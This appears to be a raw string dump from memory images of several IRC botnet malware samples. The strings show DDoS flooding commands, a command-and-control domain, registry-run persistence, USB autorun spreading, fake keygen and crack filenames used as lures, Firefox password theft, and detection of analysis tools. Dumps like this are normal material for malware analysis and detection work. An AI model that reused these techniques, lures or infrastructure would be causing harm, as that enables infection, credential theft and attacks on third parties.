[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)

[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)

01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds

01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds

[SSYN]: Flooding %s:%s for %s seconds.

[SSYN]: Flooding %s:%s for %s seconds.

NhG.gov

NhG.gov

msconfig.exe

msconfig.exe

WindowsUpdate

WindowsUpdate

Block.exe

Block.exe

s.flood

s.flood

NICK

NICK

JOIN

JOIN

root2.zapto.org

root2.zapto.org

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager

hXXp://lab005.comule.com/do/15082010/test5

hXXp://lab005.comule.com/do/15082010/test5

[Speedtest]: %d kB/s

[Speedtest]: %d kB/s

Windows Security Alert

Windows Security Alert

new{BoT-%s-%s}%s

new{BoT-%s-%s}%s

{BoT-%s-%s}%s

{BoT-%s-%s}%s

%d.%d.%d.%d

%d.%d.%d.%d

\google_cache%s.tmp

\google_cache%s.tmp

website=1

website=1

\Desktop.ini

\Desktop.ini

[.ShellClassInfo]

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

usbBlock.exe

usbBlock.exe

icon=%SystemRoot%\system32\SHELL32.dll,2

icon=%SystemRoot%\system32\SHELL32.dll,2

\autorun.inf

\autorun.inf

11Infected Drive %s

11Infected Drive %s

new{BoT-XP-USA}508870

new{BoT-XP-USA}508870

\google_cache2.tmp

\google_cache2.tmp

Ganja145.exe_1436:

.text

.text

`.data

`.data

.rsrc

.rsrc

ADVAPI32.dll

ADVAPI32.dll

KERNEL32.dll

KERNEL32.dll

NTDLL.DLL

NTDLL.DLL

GDI32.dll

GDI32.dll

USER32.dll

USER32.dll

COMCTL32.dll

COMCTL32.dll

VERSION.dll

VERSION.dll

advapi32.dll

advapi32.dll

advpack.dll

advpack.dll

wininit.ini

wininit.ini

Software\Microsoft\Windows\CurrentVersion\App Paths

Software\Microsoft\Windows\CurrentVersion\App Paths

setupapi.dll

setupapi.dll

setupx.dll

setupx.dll

IXPd.TMP

IXPd.TMP

TMP4351$.TMP

TMP4351$.TMP

FINISHMSG

FINISHMSG

USRQCMD

USRQCMD

ADMQCMD

ADMQCMD

msdownld.tmp

msdownld.tmp

wextract.pdb

wextract.pdb

PSSSSSSh

PSSSSSSh

RegCloseKey

RegCloseKey

RegOpenKeyExA

RegOpenKeyExA

RegCreateKeyExA

RegCreateKeyExA

RegQueryInfoKeyA

RegQueryInfoKeyA

GetWindowsDirectoryA

GetWindowsDirectoryA

ExitWindowsEx

ExitWindowsEx

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

rundll32.exe %s,InstallHinfSection %s 128 %s

rundll32.exe %s,InstallHinfSection %s 128 %s

SHELL32.DLL

SHELL32.DLL

Software\Microsoft\Windows\CurrentVersion\RunOnce

Software\Microsoft\Windows\CurrentVersion\RunOnce

PendingFileRenameOperations

PendingFileRenameOperations

System\CurrentControlSet\Control\Session Manager\FileRenameOperations

System\CurrentControlSet\Control\Session Manager\FileRenameOperations

wextract_cleanup%d

wextract_cleanup%d

%s /D:%s

%s /D:%s

rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"

rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"

Command.com /c %s

Command.com /c %s

hhh.exe

hhh.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\

33333330

33333330

3333333

3333333

33333333

33333333

~hq.Ol

~hq.Ol

%s,LYR}

%s,LYR}

CG.WT

CG.WT

Ul;y%S

Ul;y%S

.MPcu

.MPcu

4Ys-o}(

4Ys-o}(

%xmvB

%xmvB

Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement.

Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement.

CFailed to get disk space information from: %s.

CFailed to get disk space information from: %s.

System Message: %s.&A required resource cannot be located. Are you sure you want to cancel?

System Message: %s.&A required resource cannot be located. Are you sure you want to cancel?

8Unable to retrieve operating system version information.!Memory allocation request failed.

8Unable to retrieve operating system version information.!Memory allocation request failed.

Filetable full.Ên not change to destination folder.

Filetable full.Ên not change to destination folder.

Setup could not find a drive with %s KB free disk space to install the program. Please free up some space first and press RETRY or press CANCEL to exit setup.KThat folder is invalid. Please make sure the folder exists and is writable.IYou must specify a folder with fully qualified pathname or choose Cancel.!Could not update folder edit box.5Could not load functions required for browser dialog.7Could not load Shell32.dll required for browser dialog.

Setup could not find a drive with %s KB free disk space to install the program. Please free up some space first and press RETRY or press CANCEL to exit setup.KThat folder is invalid. Please make sure the folder exists and is writable.IYou must specify a folder with fully qualified pathname or choose Cancel.!Could not update folder edit box.5Could not load functions required for browser dialog.7Could not load Shell32.dll required for browser dialog.

(Error creating process . Reason: %s1The cluster size in this system is not supported.,A required resource appears to be corrupted.QWindows 95 or Windows NT 4.0 Beta 2 or greater is required for this installation.

(Error creating process . Reason: %s1The cluster size in this system is not supported.,A required resource appears to be corrupted.QWindows 95 or Windows NT 4.0 Beta 2 or greater is required for this installation.

Error loading %shGetProcAddress() failed on function '%s'. Possible reason: incorrect version of advpack.dll being used./Windows 95 or Windows NT is required to install

Error loading %shGetProcAddress() failed on function '%s'. Possible reason: incorrect version of advpack.dll being used./Windows 95 or Windows NT is required to install

Could not create folder '%s'

Could not create folder '%s'

To install this program, you need %s KB disk space on drive %s. It is recommended that you free up the required disk space before you continue.

To install this program, you need %s KB disk space on drive %s. It is recommended that you free up the required disk space before you continue.

Error retrieving Windows folder

Error retrieving Windows folder

$NT Shutdown: OpenProcessToken error.)NT Shutdown: AdjustTokenPrivileges error.!NT Shutdown: ExitWindowsEx error.}Extracting file failed. It is most likely caused by low memory (low disk space for swapping file) or corrupted Cabinet file.aThe setup program could not retrieve the volume information for drive (%s) .

$NT Shutdown: OpenProcessToken error.)NT Shutdown: AdjustTokenPrivileges error.!NT Shutdown: ExitWindowsEx error.}Extracting file failed. It is most likely caused by low memory (low disk space for swapping file) or corrupted Cabinet file.aThe setup program could not retrieve the volume information for drive (%s) .

System message: %s.xSetup could not find a drive with %s KB free disk space to install the program. Please free up some space and try again.eThe installation program appears to be damaged or corrupted. Contact the vendor of this application.

System message: %s.xSetup could not find a drive with %s KB free disk space to install the program. Please free up some space and try again.eThe installation program appears to be damaged or corrupted. Contact the vendor of this application.

/C: -- Override Install Command defined by author.

/C: -- Override Install Command defined by author.

eAnother copy of the '%s' package is already running on your system. Do you want to run another copy?

eAnother copy of the '%s' package is already running on your system. Do you want to run another copy?

Could not find the file: %s.

Could not find the file: %s.

:The folder '%s' does not exist. Do you want to create it?hAnother copy of the '%s' package is already running on your system. You can only run one copy at a time.OThe '%s' package is not compatible with the version of Windows you are running.SThe '%s' package is not compatible with the version of the file: %s on your system.

:The folder '%s' does not exist. Do you want to create it?hAnother copy of the '%s' package is already running on your system. You can only run one copy at a time.OThe '%s' package is not compatible with the version of Windows you are running.SThe '%s' package is not compatible with the version of the file: %s on your system.

6.00.2900.5512 (xpsp.080413-2105)

6.00.2900.5512 (xpsp.080413-2105)

WEXTRACT.EXE

WEXTRACT.EXE

Windows

Windows

Operating System

Operating System

6.00.2900.5512

6.00.2900.5512

msconfig.exe_1532_rwx_00350000_0000B000:

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

WS2_32.dll

WS2_32.dll

URLDownloadToFileA

URLDownloadToFileA

urlmon.dll

urlmon.dll

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

RegCloseKey

RegCloseKey

RegOpenKeyExA

RegOpenKeyExA

RegCreateKeyExA

RegCreateKeyExA

ADVAPI32.dll

ADVAPI32.dll

VkKeyScanA

VkKeyScanA

keybd_event

keybd_event

USER32.dll

USER32.dll

MSVCRT.dll

MSVCRT.dll

_acmdln

_acmdln

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

PRIVMSG

PRIVMSG

pong|cmd.exe###

pong|cmd.exe###

udp.stop

udp.stop

rndnick

rndnick

Cerebral botakeylog

Cerebral botakeylog

The One botspread.start

The One botspread.start

Skid placed botsregsrvs.exe

Skid placed botsregsrvs.exe

Older Botschngnick

Older Botschngnick

[FTP]

[FTP]

[Botkiller] Killing Process "%s", Type: "%s"

[Botkiller] Killing Process "%s", Type: "%s"

explorer.exe

explorer.exe

EXPLORER.EXE

EXPLORER.EXE

winlogon.exe

winlogon.exe

csrss.exe

csrss.exe

WINLOGON.EXE

WINLOGON.EXE

services.exe

services.exe

SERVICES.EXE

SERVICES.EXE

%s\%s%i%i.exe

%s\%s%i%i.exe

%s Downloading File From: %s, To: %s

%s Downloading File From: %s, To: %s

%s File Successfully Downloaded To: %s

%s File Successfully Downloaded To: %s

%s Failed To Download File Reason: Insufficient Memory

%s Failed To Download File Reason: Insufficient Memory

%s Failed To Download File Reason: Unknown

%s Failed To Download File Reason: Unknown

%s Successfully Executed: %s

%s Successfully Executed: %s

%s Failed To Execute File via Create Process Reason: Unknown

%s Failed To Execute File via Create Process Reason: Unknown

%appdata%\lsass.exe

%appdata%\lsass.exe

Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a

Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a

o.informate en el siguiente enlace

o.informate en el siguiente enlace

BeeSwarm.exe

BeeSwarm.exe

MAPI32.DLL

MAPI32.DLL

*.html

*.html

%s\%s

%s\%s

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

%s:*:Enabled:%s

%s:*:Enabled:%s

Software\Microsoft\Windows\CurrentVersion\Run\

Software\Microsoft\Windows\CurrentVersion\Run\

%s %s

%s %s

%s %s "" "TsGh" :%s

%s %s "" "TsGh" :%s

%s %s %s

%s %s %s

%s %s :%s

%s %s :%s

%s :%s

%s :%s

ganja%s.exe

ganja%s.exe

%s Updating to: %s

%s Updating to: %s

%s Execution Failed!

%s Execution Failed!

%s Dowload Failed!

%s Dowload Failed!

%s Has Been Visited!

%s Has Been Visited!

Windows Live Messenger

Windows Live Messenger

Ganja%s.exe

Ganja%s.exe

[Download]: Executed Successfully

[Download]: Executed Successfully

[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)

[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)

01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds

01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds

[SSYN]: Flooding %s:%s for %s seconds.

[SSYN]: Flooding %s:%s for %s seconds.

NhG.gov

NhG.gov

msconfig.exe

msconfig.exe

WindowsUpdate

WindowsUpdate

Block.exe

Block.exe

s.flood

s.flood

NICK

NICK

JOIN

JOIN

root2.zapto.org

root2.zapto.org

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager

hXXp://lab005.comule.com/do/15082010/test5

hXXp://lab005.comule.com/do/15082010/test5

[Speedtest]: %d kB/s

[Speedtest]: %d kB/s

Windows Security Alert

Windows Security Alert

new{BoT-%s-%s}%s

new{BoT-%s-%s}%s

{BoT-%s-%s}%s

{BoT-%s-%s}%s

%d.%d.%d.%d

%d.%d.%d.%d

\google_cache%s.tmp

\google_cache%s.tmp

website=1

website=1

\Desktop.ini

\Desktop.ini

[.ShellClassInfo]

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

usbBlock.exe

usbBlock.exe

icon=%SystemRoot%\system32\SHELL32.dll,2

icon=%SystemRoot%\system32\SHELL32.dll,2

\autorun.inf

\autorun.inf

11Infected Drive %s

11Infected Drive %s

msconfig.exe_1532_rwx_009F0000_0000B000:

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

WS2_32.dll

WS2_32.dll

URLDownloadToFileA

URLDownloadToFileA

urlmon.dll

urlmon.dll

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

RegCloseKey

RegCloseKey

RegOpenKeyExA

RegOpenKeyExA

RegCreateKeyExA

RegCreateKeyExA

ADVAPI32.dll

ADVAPI32.dll

VkKeyScanA

VkKeyScanA

keybd_event

keybd_event

USER32.dll

USER32.dll

MSVCRT.dll

MSVCRT.dll

_acmdln

_acmdln

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

PRIVMSG

PRIVMSG

pong|cmd.exe###

pong|cmd.exe###

udp.stop

udp.stop

rndnick

rndnick

Cerebral botakeylog

Cerebral botakeylog

The One botspread.start

The One botspread.start

Skid placed botsregsrvs.exe

Skid placed botsregsrvs.exe

Older Botschngnick

Older Botschngnick

[FTP]

[FTP]

[Botkiller] Killing Process "%s", Type: "%s"

[Botkiller] Killing Process "%s", Type: "%s"

explorer.exe

explorer.exe

EXPLORER.EXE

EXPLORER.EXE

winlogon.exe

winlogon.exe

csrss.exe

csrss.exe

WINLOGON.EXE

WINLOGON.EXE

services.exe

services.exe

SERVICES.EXE

SERVICES.EXE

%s\%s%i%i.exe

%s\%s%i%i.exe

%s Downloading File From: %s, To: %s

%s Downloading File From: %s, To: %s

%s File Successfully Downloaded To: %s

%s File Successfully Downloaded To: %s

%s Failed To Download File Reason: Insufficient Memory

%s Failed To Download File Reason: Insufficient Memory

%s Failed To Download File Reason: Unknown

%s Failed To Download File Reason: Unknown

%s Successfully Executed: %s

%s Successfully Executed: %s

%s Failed To Execute File via Create Process Reason: Unknown

%s Failed To Execute File via Create Process Reason: Unknown

%appdata%\lsass.exe

%appdata%\lsass.exe

Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a

Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a

o.informate en el siguiente enlace

o.informate en el siguiente enlace

BeeSwarm.exe

BeeSwarm.exe

MAPI32.DLL

MAPI32.DLL

*.html

*.html

%s\%s

%s\%s

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

%s:*:Enabled:%s

%s:*:Enabled:%s

Software\Microsoft\Windows\CurrentVersion\Run\

Software\Microsoft\Windows\CurrentVersion\Run\

%s %s

%s %s

%s %s "" "TsGh" :%s

%s %s "" "TsGh" :%s

%s %s %s

%s %s %s

%s %s :%s

%s %s :%s

%s :%s

%s :%s

ganja%s.exe

ganja%s.exe

%s Updating to: %s

%s Updating to: %s

%s Execution Failed!

%s Execution Failed!

%s Dowload Failed!

%s Dowload Failed!

%s Has Been Visited!

%s Has Been Visited!

Windows Live Messenger

Windows Live Messenger

Ganja%s.exe

Ganja%s.exe

[Download]: Executed Successfully

[Download]: Executed Successfully

[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)

[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)

01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds

01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds

[SSYN]: Flooding %s:%s for %s seconds.

[SSYN]: Flooding %s:%s for %s seconds.

NhG.gov

NhG.gov

msconfig.exe

msconfig.exe

WindowsUpdate

WindowsUpdate

Block.exe

Block.exe

s.flood

s.flood

NICK

NICK

JOIN

JOIN

root2.zapto.org

root2.zapto.org

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager

hXXp://lab005.comule.com/do/15082010/test5

hXXp://lab005.comule.com/do/15082010/test5

[Speedtest]: %d kB/s

[Speedtest]: %d kB/s

Windows Security Alert

Windows Security Alert

new{BoT-%s-%s}%s

new{BoT-%s-%s}%s

{BoT-%s-%s}%s

{BoT-%s-%s}%s

%d.%d.%d.%d

%d.%d.%d.%d

\google_cache%s.tmp

\google_cache%s.tmp

website=1

website=1

\Desktop.ini

\Desktop.ini

[.ShellClassInfo]

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

usbBlock.exe

usbBlock.exe

icon=%SystemRoot%\system32\SHELL32.dll,2

icon=%SystemRoot%\system32\SHELL32.dll,2

\autorun.inf

\autorun.inf

11Infected Drive %s

11Infected Drive %s

NESbot.exe_612:

.text

.text

`.rdata

`.rdata

@.data

@.data

VkKeyScanA

VkKeyScanA

keybd_event

keybd_event

EnumWindows

EnumWindows

USER32.dll

USER32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

MSVCRT.dll

MSVCRT.dll

_acmdln

_acmdln

RegCloseKey

RegCloseKey

RegOpenKeyExA

RegOpenKeyExA

RegCreateKeyExA

RegCreateKeyExA

ADVAPI32.dll

ADVAPI32.dll

WS2_32.dll

WS2_32.dll

URLDownloadToFileA

URLDownloadToFileA

urlmon.dll

urlmon.dll

\SonyCam03-2008.zip

\SonyCam03-2008.zip

SonyCam03-2008.zip

SonyCam03-2008.zip

SonyCam%d%d%d%d%d%d%d%d%d%d%d.JPG__VVV.photobucket.com

SonyCam%d%d%d%d%d%d%d%d%d%d%d.JPG__VVV.photobucket.com

\temp\syz.tmp

\temp\syz.tmp

gafgatew.tmp

gafgatew.tmp

_023.jpeg-VVV.myspace.com

_023.jpeg-VVV.myspace.com

edonkey2000\incoming\

edonkey2000\incoming\

Windows 2008 Server KeyGen.exe

Windows 2008 Server KeyGen.exe

DeadSpace KeyGen.exe

DeadSpace KeyGen.exe

Half-Life 2 WORKS-ON-STEAM.exe

Half-Life 2 WORKS-ON-STEAM.exe

Left4Dead-STEAM-Online-Crack-WORKS-DECEMBER08.exe

Left4Dead-STEAM-Online-Crack-WORKS-DECEMBER08.exe

Password Cracker.exe

Password Cracker.exe

FTP Cracker.exe

FTP Cracker.exe

Hotmail Hacker.exe

Hotmail Hacker.exe

Hotmail Cracker.exe

Hotmail Cracker.exe

Norton Anti-Virus 2008 Enterprise Crack.exe

Norton Anti-Virus 2008 Enterprise Crack.exe

Kaspersky 2009 Full Suite Crack.exe

Kaspersky 2009 Full Suite Crack.exe

Microsoft Visual C 6 KeyGen.exe

Microsoft Visual C 6 KeyGen.exe

Microsoft Visual Basic 6 KeyGen.exe

Microsoft Visual Basic 6 KeyGen.exe

Microsoft Visual Studio 6 KeyGen.exe

Microsoft Visual Studio 6 KeyGen.exe

Microsoft Visual Studio 2008 KeyGen.exe

Microsoft Visual Studio 2008 KeyGen.exe

Microsoft Visual Basic 2008 KeyGen.exe

Microsoft Visual Basic 2008 KeyGen.exe

Microsoft Visual C 2008 KeyGen.exe

Microsoft Visual C 2008 KeyGen.exe

MSN Live Password Cracker.exe

MSN Live Password Cracker.exe

AOL Instant Messenger (AIM) Cracker.exe

AOL Instant Messenger (AIM) Cracker.exe

AOL Triton Cracker.exe

AOL Triton Cracker.exe

ICQ Account Cracker.exe

ICQ Account Cracker.exe

AOL Password Cracker.exe

AOL Password Cracker.exe

Counter-Strike KeyGen.exe

Counter-Strike KeyGen.exe

Counter-Strike Source KeyGen.exe

Counter-Strike Source KeyGen.exe

DivX Pro KeyGen.exe

DivX Pro KeyGen.exe

RuneScape Cracker.exe

RuneScape Cracker.exe

RuneScape Gold Exploit.exe

RuneScape Gold Exploit.exe

Windows XP Keygen

Windows XP Keygen

Windows XP Crack.exe

Windows XP Crack.exe

Windows Vista Keygen

Windows Vista Keygen

Widnows Vista Crack.exe

Widnows Vista Crack.exe

Kaspersky Crck.exe

Kaspersky Crck.exe

Kaspersky Keygen.exe

Kaspersky Keygen.exe

WOW Account Cracker.exe

WOW Account Cracker.exe

Project 7 Private 4.8.exe

Project 7 Private 4.8.exe

Virus Generator.exe

Virus Generator.exe

Virus Maker.exe

Virus Maker.exe

Nod32 Crack.exe

Nod32 Crack.exe

Nod32 Keygen.exe

Nod32 Keygen.exe

Steam Account Stealer.exe

Steam Account Stealer.exe

Myspace Cracker.exe

Myspace Cracker.exe

Myspace Bruteforce.exe

Myspace Bruteforce.exe

Myspace Attack.exe

Myspace Attack.exe

Limewire Pro Downloader.exe

Limewire Pro Downloader.exe

Tcpip Patch.exe

Tcpip Patch.exe

MSN Hacker 2008.exe

MSN Hacker 2008.exe

MSN Hacker 2009.exe

MSN Hacker 2009.exe

AOL Hacker 2008.exe

AOL Hacker 2008.exe

AOL Hacker 2009.exe

AOL Hacker 2009.exe

YIM HAcker 2008.exe

YIM HAcker 2008.exe

YIM HAcker 2009.exe

YIM HAcker 2009.exe

PhotoShop Keygen.exe

PhotoShop Keygen.exe

Adobe Photoshop Keygen.exe

Adobe Photoshop Keygen.exe

Adobe Photoshop Crack.exe

Adobe Photoshop Crack.exe

Photoshop Crack.exe

Photoshop Crack.exe

Adobe Keygen.exe

Adobe Keygen.exe

Adobe Photoshop CS3 Keygen.exe

Adobe Photoshop CS3 Keygen.exe

Adobe Photoshop CS4 KeyGen.exe

Adobe Photoshop CS4 KeyGen.exe

RuneScape 2008 - Newest Exploits.exe

RuneScape 2008 - Newest Exploits.exe

SOFTWARE\Microsoft\Windows\CurrentVersion

SOFTWARE\Microsoft\Windows\CurrentVersion

%s\%s

%s\%s

keygen

keygen

KeyGen.exe

KeyGen.exe

shlwapi.dll

shlwapi.dll

[.ShellClassInfo]

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

\Desktop.ini

\Desktop.ini

\autorun.inf

\autorun.inf

icon=%SystemRoot%\system32\SHELL32.dll,4

icon=%SystemRoot%\system32\SHELL32.dll,4

ahoo] - Msg & File Sent To: %s Contacts.

ahoo] - Msg & File Sent To: %s Contacts.

%s%d%d%d.JPG.scr

%s%d%d%d.JPG.scr

%s%d%d%d

%s%d%d%d

KeyGen

KeyGen

mozcrt19.dll

mozcrt19.dll

nspr4.dll

nspr4.dll

plds4.dll

plds4.dll

plc4.dll

plc4.dll

nssutil3.dll

nssutil3.dll

sqlite3.dll

sqlite3.dll

softokn3.dll

softokn3.dll

nss3.dll

nss3.dll

PK11_GetInternalKeySlot

PK11_GetInternalKeySlot

PK11_CheckUserPassword

PK11_CheckUserPassword

[Pstore-FF] %s %s:%s

[Pstore-FF] %s %s:%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Application Data\Mozilla\Firefox

Application Data\Mozilla\Firefox

\profiles.ini

\profiles.ini

SOFTWARE\Mozilla\Mozilla Firefox

SOFTWARE\Mozilla\Mozilla Firefox

signons1.txt

signons1.txt

signons2.txt

signons2.txt

signons3.txt

signons3.txt

pstorec.dll

pstorec.dll

%s %s %s:%s

%s %s %s:%s

http:/

http:/

https:/

https:/

kWindows Security Alert

kWindows Security Alert

SbieDll.dll

SbieDll.dll

TCPView - Sysinternals: VVV.sysinternals.com

TCPView - Sysinternals: VVV.sysinternals.com

Process Monitor - Sysinternals: VVV.sysinternals.com

Process Monitor - Sysinternals: VVV.sysinternals.com

Process Explorer - Sysinternals: VVV.sysinternals.com

Process Explorer - Sysinternals: VVV.sysinternals.com

File Monitor - Sysinternals: VVV.sysinternals.com

File Monitor - Sysinternals: VVV.sysinternals.com

SwitchSniffer v1.3.2.0 Registered

SwitchSniffer v1.3.2.0 Registered

SwitchSniffer v1.3.2.0 UnRegistered

SwitchSniffer v1.3.2.0 UnRegistered

Auto Start and Process Viewer : VVV.konradp.com

Auto Start and Process Viewer : VVV.konradp.com

Remote Process Viewer for Windows Networks

Remote Process Viewer for Windows Networks

Process Heap Viewer - VVV.SecurityXploded.com

Process Heap Viewer - VVV.SecurityXploded.com

KERNEL32.DLL

KERNEL32.DLL

TASKMGR.EXE

TASKMGR.EXE

%s gained access..

%s gained access..

%s did not break in..

%s did not break in..

: %s!%s@%s (PM: "%s")

: %s!%s@%s (PM: "%s")

%s fail by: %s!%s@%s (tried: %s)

%s fail by: %s!%s@%s (tried: %s)

%s %s out.

%s %s out.

%s out.

%s out.

%s error: no user at:

%s error: no user at:

%s invalid slot:

%s invalid slot:

%s kill: threads

%s kill: threads

%s no threads

%s no threads

%s killed thread:

%s killed thread:

%s failed kt:

%s failed kt:

%s %s already running: .

%s %s already running: .

%s faild 2 start %s, err: .

%s faild 2 start %s, err: .

%s status: %s.

%s status: %s.

uptime: %s,

uptime: %s,

for: %s.

for: %s.

%s Bot installed on: %s.

%s Bot installed on: %s.

sn] Msg & File Sent To %d Contacts.

sn] Msg & File Sent To %d Contacts.

by: %s!%s@%s

by: %s!%s@%s

%s Advapi.dll Failed

%s Advapi.dll Failed

%s PStore.dll Failed.

%s PStore.dll Failed.

%s Main thread.

%s Main thread.

%s RuC.

%s RuC.

%s mis paramter[s].

%s mis paramter[s].

%s -SECURE-LOCKDOWN-INITIATED- You THOUGHT you had me :)

%s -SECURE-LOCKDOWN-INITIATED- You THOUGHT you had me :)

%s spreading disabled.

%s spreading disabled.

%s Thread Disabled.

%s Thread Disabled.

FIREFOX Threads

FIREFOX Threads

%s ddosing %s:%s/%s secs.

%s ddosing %s:%s/%s secs.

%s unable to start ddos, error: %s

%s unable to start ddos, error: %s

%s %s

%s %s

%s seeding!

%s seeding!

%s unable to download file

%s unable to download file

%s wget: %s location: %s.

%s wget: %s location: %s.

%seraseme_%d%d%d%d%d.exe

%seraseme_%d%d%d%d%d.exe

%s Downloading update from: %s to: %s.

%s Downloading update from: %s to: %s.

%s updating from %s

%s updating from %s

%s Couldn't open file for writing: %s.

%s Couldn't open file for writing: %s.

%s File download: %.1fKB to: %s @ %.1fKB/sec.

%s File download: %.1fKB to: %s @ %.1fKB/sec.

%s Couldn't parse path, error:

%s Couldn't parse path, error:

%s Failed to create process: "%s", error:

%s Failed to create process: "%s", error:

%s Created process: "%s", PID:

%s Created process: "%s", PID:

%s Process Finished: "%s", Total Running Time: %s.

%s Process Finished: "%s", Total Running Time: %s.

%s Update failed: Error executing file: %s.

%s Update failed: Error executing file: %s.

%s Bad URL or DNS Error, error:

%s Bad URL or DNS Error, error:

Ping Timeout? (%d-%d)%d/%d

Ping Timeout? (%d-%d)%d/%d

PASS %s

PASS %s

NICK %s

NICK %s

USER NESv5 * 0 :%s

USER NESv5 * 0 :%s

QUIT %s

QUIT %s

JOIN

JOIN

PRIVMSG

PRIVMSG

NICK

NICK

PONG %s

PONG %s

NOTICE %s :%s

NOTICE %s :%s

PRIVMSG %s :%s

PRIVMSG %s :%s

JOIN %s

JOIN %s

JOIN %s %s

JOIN %s %s

PART %s

PART %s

MODE %s %s

MODE %s %s

MODE %s %s %s

MODE %s %s %s

Torrent 1.8.1

Torrent 1.8.1

%d.%d.%d.%d

%d.%d.%d.%d

kernel32.dll

kernel32.dll

user32.dll

user32.dll

advapi32.dll

advapi32.dll

RegEnumKeyExA

RegEnumKeyExA

ws2_32.dll

ws2_32.dll

wininet.dll

wininet.dll

HttpOpenRequestA

HttpOpenRequestA

HttpSendRequestA

HttpSendRequestA

FtpGetFileA

FtpGetFileA

FtpPutFileA

FtpPutFileA

InternetOpenUrlA

InternetOpenUrlA

InternetCrackUrlA

InternetCrackUrlA

Mozilla/4.0 (compatible)

Mozilla/4.0 (compatible)

netapi32.dll

netapi32.dll

dnsapi.dll

dnsapi.dll

iphlpapi.dll

iphlpapi.dll

GetTcpTable

GetTcpTable

GetUdpTable

GetUdpTable

mpr.dll

mpr.dll

shell32.dll

shell32.dll

ShellExecuteA

ShellExecuteA

odbc32.dll

odbc32.dll

SQLDriverConnect

SQLDriverConnect

SQLSetEnvAttr

SQLSetEnvAttr

SQLExecDirect

SQLExecDirect

SQLAllocHandle

SQLAllocHandle

SQLFreeHandle

SQLFreeHandle

SQLDisconnect

SQLDisconnect

userenv.dll

userenv.dll

psapi.dll

psapi.dll

hXXp://checkip.dyndns.org

hXXp://checkip.dyndns.org

hXXp://VVV.whatismyip.com

hXXp://VVV.whatismyip.com

%s%%s

%s%%s

%s!%s@%s

%s!%s@%s

%s fail nigga. (%s!%s@%s) password: %s.

%s fail nigga. (%s!%s@%s) password: %s.

%s too many users logged in.

%s too many users logged in.

%s logged in.

%s logged in.

NESbot %s thread stopped. (%d thread(s) stopped.)

NESbot %s thread stopped. (%d thread(s) stopped.)

NESbot No %s thread found.

NESbot No %s thread found.

%s\removeMe%i%i%i%i.bat

%s\removeMe%i%i%i%i.bat

del "%s">nul

del "%s">nul

